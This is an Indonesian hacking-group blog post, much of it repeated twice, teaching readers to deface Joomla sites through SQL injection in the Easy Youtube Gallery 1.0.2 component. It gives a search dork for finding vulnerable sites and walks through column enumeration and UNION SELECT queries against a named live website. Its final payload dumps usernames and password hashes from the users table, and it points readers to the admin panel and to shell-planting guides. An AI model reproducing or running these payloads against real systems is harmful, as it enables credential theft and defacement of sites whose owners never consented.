Stay Cool and Keep ./Crotz gaes, kali ini gue 3xBitCh bakal Share Tutorial Deface Joomla Easy Youtube Gallery 1.0.2 SQL Injection Vulnerability
yoii kali ini kita maen suntik2an di CMS Joomblo.
1. Kita Search Dork nya menggunakan search engine
2. Oke kita Pilih Target Yang mau kita injek, disini letak injeknya ada di mycategory= ,
kita coba input string ,jika seperti ini tandanya VULN
3. Sekarang kita coba cari errornya dimana.
Kita coba injek satu satu:
http://centreexcursionistabocairent.com/index.php?option=com_easy_youtube_gallery&view=videos&mycategory=0+order+by+1--+&defaultvideo=3&Itemid=120 // masih normal
http://centreexcursionistabocairent.com/index.php?option=com_easy_youtube_gallery&view=videos&mycategory=0+order+by+2--+&defaultvideo=3&Itemid=120 // masih normal lagee
http://centreexcursionistabocairent.com/index.php?option=com_easy_youtube_gallery&view=videos&mycategory=0+order+by+3--+&defaultvideo=3&Itemid=120 // masih normal mpe lemez mz
http://centreexcursionistabocairent.com/index.php?option=com_easy_youtube_gallery&view=videos&mycategory=0+order+by+15--+&defaultvideo=3&Itemid=120 // error gan :v *jozz ahhh~
5. Oke biar gampang, saya pake DIOS nya mas madblood /-\
6. Sekarang kita liat lebih dalem lagi gimana? :v
Ini querynya :
http://centreexcursionistabocairent.com/index.php
?option=com_easy_youtube_gallery
&view=videos
&mycategory=-0+union+select+1,2,3,4,5,6,group_concat(username,0x3a,password),8,9,10,11,12,13,14+from+ceb_users--+
&defaultvideo=3
&Itemid=120
Karna ini cms Joomla letak page adminnya ada di target.coli/administrator/
Btw yuk up2date tentang TKJ Cyber Art, di Official Account Line Kami: http://line.me/ti/p/%40hjl8740i
*bebas utk bertanya *sharing bareng *kepo2deh akwkwa #joinUs
Selamat berinjek dan berhash2 ria akwkawk
Oke Sekian tutorial dari saya, Semoga bermanfaat bagi kalean.
source and thanks to: 0day
Call Me Sayang A.K.A 3xBitch
Visit and follow :
yoii kali ini kita maen suntik2an di CMS Joomblo.
Oke langsung Aja gay gak usah banyak coli cocote
Dork :
inurl:com_easy_youtube_gallery mycategory
(Selebihnya kebangin lg menggunakan imajinasi vokepers kalian, biar dpt yg vuln n verawan)
1. Kita Search Dork nya menggunakan search engine
2. Oke kita Pilih Target Yang mau kita injek, disini letak injeknya ada di mycategory= ,
kita coba input string ,jika seperti ini tandanya VULN
3. Sekarang kita coba cari errornya dimana.
Kita coba injek satu satu:
http://centreexcursionistabocairent.com/index.php?option=com_easy_youtube_gallery&view=videos&mycategory=0+order+by+1--+&defaultvideo=3&Itemid=120 // masih normal
http://centreexcursionistabocairent.com/index.php?option=com_easy_youtube_gallery&view=videos&mycategory=0+order+by+2--+&defaultvideo=3&Itemid=120 // masih normal lagee
http://centreexcursionistabocairent.com/index.php?option=com_easy_youtube_gallery&view=videos&mycategory=0+order+by+3--+&defaultvideo=3&Itemid=120 // masih normal mpe lemez mz
http://centreexcursionistabocairent.com/index.php?option=com_easy_youtube_gallery&view=videos&mycategory=0+order+by+15--+&defaultvideo=3&Itemid=120 // error gan :v *jozz ahhh~
Kolomnya cuman sampe 14 gannn |
4. Oke lanjut ke step berikutnya, kita cari angka ajaibnya :D
http://centreexcursionistabocairent.com/index.php?option=com_easy_youtube_gallery&view=videos&mycategory=-0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--+&defaultvideo=3&Itemid=120
Nah, angka ajaibnya Keliatan Gay :v |
Nah keliatankan Isi daleman web nya ?:v |
Tuh DALEMANNYA keliatan gann :v
Terus abis itu diapain , kalo dh keliatan dalemannya ? , buka tusuk -> crotz di dalem..Ini querynya :
http://centreexcursionistabocairent.com/index.php
?option=com_easy_youtube_gallery
&view=videos
&mycategory=-0+union+select+1,2,3,4,5,6,group_concat(username,0x3a,password),8,9,10,11,12,13,14+from+ceb_users--+
&defaultvideo=3
&Itemid=120
Karna ini cms Joomla letak page adminnya ada di target.coli/administrator/
Baca juga, tutorial cara menanam Shell di CMS Joomla: Cara Deface Com_User Auto Exploiter dan Cara menanam shell di CMS Joomla
Btw yuk up2date tentang TKJ Cyber Art, di Official Account Line Kami: http://line.me/ti/p/%40hjl8740i
*bebas utk bertanya *sharing bareng *kepo2deh akwkwa #joinUs
Selamat berinjek dan berhash2 ria akwkawk
Oke Sekian tutorial dari saya, Semoga bermanfaat bagi kalean.
source and thanks to: 0day
Call Me Sayang A.K.A 3xBitch
tidak perlu muncul ke permukaan , yang penting tetap bergerilya |
Visit and follow :
FP : TKJ Cyber Art
G+ : TKJ Cyber Art
youtube : TKJ Cyber Art
BBM : C0018D1A2
Line : http://line.me/ti/p/%40hjl8740i
2 comments
hmm angka ajaib udah keliatan, tapi pas mau ke step brikutnya eror seperti gambar eror pertama, kenapa tuh? hehe
bila ada pertanyaan langsung dikirim ke wall fanspage kami saja kak :)
agar dapat dijawab oleh penulis thread ini :)
terimakasih telah membaca postingan ini, salam sukses br0 :D
EmoticonEmoticon